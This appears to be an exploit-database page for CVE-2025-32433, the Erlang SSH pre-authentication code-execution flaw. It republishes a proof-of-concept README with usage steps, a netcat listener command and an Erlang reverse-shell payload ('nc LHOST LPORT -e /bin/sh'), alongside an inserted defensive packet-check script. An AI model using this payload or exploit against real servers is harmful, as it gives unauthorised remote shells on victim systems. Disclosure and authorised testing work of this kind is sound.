Vulnerability Details
Basic Information
| Title | Exploit for CVE-2025-3243 |
|---|---|
| Type | githubexploit |
| Published | 2025-04-24T19:31:49 |
| Last Seen | 2025-04-25T00:03:35 |
| CVSS Score | 10.0 (CRITICAL) |
CVSS v3 Details
| Attack Vector | NETWORK |
|---|---|
| Attack Complexity | LOW |
| Privileges Required | NONE |
| User Interaction | NONE |
| Scope | CHANGED |
| Confidentiality Impact | HIGH |
| Integrity Impact | HIGH |
| Availability Impact | HIGH |
CVE Information
| CVE IDs | CVE-2025-32433, CVE-2025-3243 |
|---|---|
| CWE | |
| Bulletin Family | exploit |
Description
A proof-of-concept exploit for **CVE-2025-32433**, a critical vulnerability in Erlang’s SSH library that allows pre-authenticated code execution via malformed `SSH_MSG_CHANNEL_REQUEST` packets.
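A defender-side check for the condition described above, as an added example that is not part of the original page or the exploit repository: it walks the cleartext part of a reassembled client-to-server SSH stream and reports connection-protocol messages (numbers 80 to 127, which include `SSH_MSG_CHANNEL_REQUEST` = 98) seen before `SSH_MSG_NEWKEYS`. The message numbers come from RFC 4253 and RFC 4254; the function names and sample streams are constructed for illustration, and the check assumes the request arrives unencrypted, so a request sent after key exchange would not be visible to it.

```python
import struct

# Message numbers from RFC 4253 and RFC 4254 (not taken from the page).
SSH_MSG_NEWKEYS = 21
CONNECTION_RANGE = range(80, 128)  # connection protocol: valid only after auth
NAMES = {98: "SSH_MSG_CHANNEL_REQUEST"}

def frame(payload: bytes) -> bytes:
    """Wrap a payload as an unencrypted SSH binary packet (RFC 4253, section 6)."""
    pad = 8 - (len(payload) + 5) % 8
    if pad < 4:
        pad += 8
    return struct.pack(">IB", len(payload) + pad + 1, pad) + payload + bytes(pad)

def preauth_channel_messages(client_bytes: bytes) -> list:
    """Name the connection-protocol messages a client sent in cleartext.
    client_bytes is the reassembled client-to-server stream. Traffic after
    SSH_MSG_NEWKEYS is encrypted, so parsing stops there; any message numbered
    80-127 before that point was sent before authentication.
    """
    end = client_bytes.find(b"\n")  # end of the "SSH-2.0-..." identification line
    if not client_bytes.startswith(b"SSH-") or end < 0:
        return []
    pos, hits = end + 1, []
    while pos + 6 <= len(client_bytes):
        length, pad = struct.unpack_from(">IB", client_bytes, pos)
        # Stop on truncated or implausible framing instead of guessing.
        if not 2 <= length <= 35000 or pad > length - 2:
            break
        if pos + 4 + length > len(client_bytes):
            break
        msg = client_bytes[pos + 5]
        if msg == SSH_MSG_NEWKEYS:
            break
        if msg in CONNECTION_RANGE:
            hits.append(NAMES.get(msg, f"message {msg}"))
        pos += 4 + length
    return hits

# Constructed samples: message-type byte plus zero filler, no real request bodies.
BANNER = b"SSH-2.0-constructed_client\r\n"
KEXINIT = frame(bytes([20]) + bytes(16))
# 0x62 filler stands in for ciphertext after NEWKEYS; it must not be flagged.
NORMAL = BANNER + KEXINIT + frame(bytes([30]) + bytes(32)) + frame(bytes([21])) + b"\x62" * 64
SUSPECT = BANNER + KEXINIT + frame(bytes([98]) + bytes(12))

if __name__ == "__main__":
    for label, stream in (("normal", NORMAL), ("suspect", SUSPECT)):
        print(label, preauth_channel_messages(stream))
```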

---
## Features
- **Original exploit** by Matthew Keeley
- **Updated version** by Tyler Ramsbey:
  - Command-line arguments for **LHOST**, **LPORT**, **RHOST**, and **RPORT**
  - Built-in help and usage via `argparse`
  - Erlang-style reverse shell payload using `os:cmd("nc LHOST LPORT -e /bin/sh").`
  - Clean function decomposition and status logging for each stage

---
## Prerequisites
- **Python 3**
- A working `nc` (Netcat) listener on your attack machine
- Network access to the target SSH service (default port `22`)

---
## Usage
1. **Start your listener** on the attack box:
   ```sh
   nc -lvnp 4444
   ```
2. **Run the exploit**:
   ```sh
   python3 CVE-2025-32433.py -lh [Attacker-IP] -lp [Attacker-Port] -rh [Victim-IP] -rp [Victim-Port]
   ```
3. **Wait for the shell** to connect back to your listener.
### Help Menu
```sh
$ python3 CVE-2025-32433.py -h
usage: CVE-2025-32433.py [-h] -lh LHOST -lp LPORT [-rh RHOST] [-rp RPORT]

Send a pre-auth SSH channel request with an Erlang RCE payload
to get a reverse shell

optional arguments:
  -h, --help            show this help message and exit
  -lh LHOST, --lhost LHOST
                        Local host/IP to receive the reverse shell
  -lp LPORT, --lport LPORT
                        Local port to receive the reverse shell
  -rh RHOST, --rhost RHOST
                        Target SSH server IP (default: 10.10.248.101)
  -rp RPORT, --rport RPORT
                        Target SSH server port (default: 22)
```

---
## Credits
- **Original script** by Matthew Keeley ([MattKeeley](https://github.com/MattKeeley))
- **This updated version** by Tyler Ramsbey

---
## Disclaimer
Use this code only on systems you own or have explicit permission to test. Unauthorized exploitation of vulnerabilities is illegal and unethical.
Impact Assessment
| Base Score | 10.0 |
|---|---|
| Severity | CRITICAL |